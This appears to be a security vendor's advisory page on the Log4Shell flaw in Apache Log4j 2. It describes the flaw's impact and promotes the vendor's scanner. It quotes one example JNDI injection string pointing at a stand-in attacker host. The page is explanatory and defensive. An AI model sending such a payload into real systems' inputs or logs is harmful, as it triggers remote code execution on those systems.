CVE-2021-44228: Log4Shell
What is Log4Shell (CVE-2021-44228)?
A critical remote code execution vulnerability in Apache Log4j 2, the most widely used Java logging framework. Attackers can execute arbitrary code by sending a crafted log message containing a JNDI lookup string (${jndi:ldap://attacker.com/a}). The vulnerability affects virtually every Java application using Log4j 2.x.
Impact & Exploitation
Affected an estimated 93% of enterprise cloud environments. Exploited within hours of disclosure by cryptominers, ransomware, and nation-state actors. Over 800,000 attacks detected in the first 72 hours.
How Precogs AI Detects Log4Shell
Precogs AI Binary SAST detects Log4j in compiled Java applications, WAR/JAR files, and Docker images — even when shaded or repackaged. Our scanner identifies vulnerable versions in firmware and embedded systems where Java is compiled into native images.
Precogs Research
This vulnerability intelligence report was analyzed and enriched by the Precogs AI Security Team. Our researchers continuously monitor emerging threats across AI code, LLM pipelines, and binary architectures to ensure accurate real-time remediation guidance.